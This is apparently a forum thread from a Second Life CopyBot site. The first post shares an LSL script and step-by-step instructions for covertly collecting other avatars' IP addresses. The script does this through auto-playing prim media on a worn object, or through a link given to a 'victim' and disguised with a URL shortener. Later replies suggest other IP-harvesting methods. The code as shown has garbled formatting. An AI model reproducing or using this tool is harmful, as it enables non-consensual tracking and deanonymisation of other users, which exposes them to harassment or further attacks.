IP Grabber

Thread Started By zion

8141
11
  • 41 Vote(s) - 2.59 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rate Thread
#1
1. place the script in an object you're wearing
2. click the object any time you enter a new sim
3. collect IPS (only works on people on certain viewers)
4. alternatively use the link the object posts in local chat(llOwnerSay)
and give it to a victim to click and get their ip that way
5. use tinyurl or something to make the link less obvious

PHP Code:
integer listen_handle;
key url_request;
string web;
key avatar;
integer counter;



 
default
{
    
     
touch(integer num_detected)
     {
         
llResetScript();
     }
     
     
    
state_entry()
    {
       
        
url_request llRequestURL();
        

//llOwnerSay(web);
    
}

    
    
    
http_request(key idstring methodstring body)
{
if (
url_request == id)
{
url_request "";
if (
method == URL_REQUEST_GRANTED)
{

web=body;
llOwnerSay(web);

        
llSetPrimMediaParams(0,
[
PRIM_MEDIA_AUTO_PLAY,TRUE,
PRIM_MEDIA_CURRENT_URL,web,
PRIM_MEDIA_HOME_URL,web,
PRIM_MEDIA_PERMS_CONTROLPRIM_MEDIA_PERM_NONE,
PRIM_MEDIA_HEIGHT_PIXELS,512,
PRIM_MEDIA_WIDTH_PIXELS,512]);


}
else if (
method == URL_REQUEST_DENIED)
{


}
}
if (
method == "GET") {
string ip llGetHTTPHeader(id"x-remote-ip");
string user llGetHTTPHeader(id"x-path-info");

llOwnerSay"Got IP: " ip " / " user);


}
}

Reply


Page 2 (The above is first post of this thread)
#11
Being this is from 2013, there is simpler ways now to grab IP's. One way would be is if you play music and stream.. You can see everyone who connects and listens.
Reply


#12
this script is not blacklisted ?
Reply




Forum Jump:

1 Guest(s)
Share this:

About Second Life Copybot

Second Life CopyBot Forum is a place where you can get items for Second Life and other vitual worlds for free. With our CopyBot viewers you can export and import any content from these virtual worlds and modify them in 3D software such as Blender, 3D studio Macx etc...